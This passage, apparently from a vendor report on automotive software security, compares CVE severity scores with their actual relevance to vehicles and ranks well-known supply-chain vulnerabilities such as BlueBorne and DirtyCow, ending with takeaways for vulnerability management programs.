CVE-2017-10989    9.8          SQLite
CVE-2018-1000301  9.1          cURL
CVE-2018-1000120  9.8          cURL
Table 2 – Comparison of common CVEs and automotive-related CVEs
4.1 Severity vs. Relevance
The severity of each vulnerability in Table 2, expressed as a CVSS score, gives some indication of its impact on automotive security, but severity alone is a limited basis for judging the overall security risk to a vehicle. Yet typical automotive OEMs and manufacturers have limited security staff and time, so they cannot analyze every vulnerability that could affect vehicle security and must instead focus on identifying and mitigating the high-severity ones.
Vulnerabilities rated “medium” severity account for roughly 40% of all vulnerabilities, and precisely because they are rated medium, they mostly remain unpatched inside vehicle components. But medium severity does not mean medium risk: some of these vulnerabilities can cause more serious damage than certain high-severity vulnerabilities for which no exploit exists.
CVSS scores do not consider the relationships between vulnerabilities or their potential combined impact.
In particular, vulnerabilities in automotive software serve as entry points into the vehicle, enabling lateral movement between components along the full attack chain. Because most security teams concentrate on identifying and mitigating high-severity vulnerabilities, attacks exploiting medium-severity vulnerabilities succeed more often, which is why attackers favor medium-severity CVEs.
As noted above, automotive software contains many inherent vulnerabilities. Only by analyzing the correlations between a vehicle’s components and software can the CVEs with a real impact on those components be identified; this makes it possible to eliminate even the CVEs that can harm vehicle security regardless of their severity score.
According to Cybellum’s findings, however, on average more than 80% of the CVEs detected in vehicle components had not been analyzed for relevance, so vulnerabilities that could have a serious impact were left unmitigated and unremoved.
More than 80% of CVE vulnerabilities are not removed.
As this shows, context awareness of the interrelationships between software functions optimizes the return on investment (ROI) of a vulnerability management program while improving the overall security of the product.
4.2 Notorious Supply-Chain Vulnerabilities
Something is missing from the vulnerability lists above: the notorious vulnerabilities that repeatedly made press headlines do not appear in the top 10 of the list of automotive software vulnerabilities.
The top three so-called ‘notorious supply-chain vulnerabilities’ threatening automotive software – BlueBorne, DirtyCow, and Drown – were discovered four to five years ago, yet they still affect automotive software. With systematic cybersecurity practices in place, mitigations for these vulnerabilities should have been available shortly after they were discovered.
Rank   Vulnerability   Year discovered
01     BlueBorne       2017
02     DirtyCow        2016
03     Drown           2016
04     SweynTooth      2020
05     Ripple20        2020
06     Amnesia:33      2020
07     Urgent/11       2019
08     Ghost           2015
Table 3 – Ranking of notorious vulnerabilities threatening automotive software
Vulnerabilities such as Ripple20, Amnesia:33, and Urgent/11 are recently discovered supply-chain vulnerabilities embedded in communication stacks that are widely used across many suppliers.
KEY TAKEAWAYS
Most publicly disclosed CVEs do not affect automotive software, but with so much software and so many vulnerabilities, identifying those that actually affect a vehicle or its components is like finding a needle in a haystack.
Traditional security practices rely on manual detection and response and therefore cannot provide deep insight. Rapid problem-solving requires automated processes.
A vulnerability management program must be able to identify the risks most likely to affect vehicle security, based on awareness and analysis of the correlations between a product’s components and software. In practice, most security issues can be identified and resolved during development, before the product goes into production.
Supply-chain risk has a real impact on automotive software. Vulnerabilities discovered years ago should have been, and should be able to be, mitigated through robust security practices.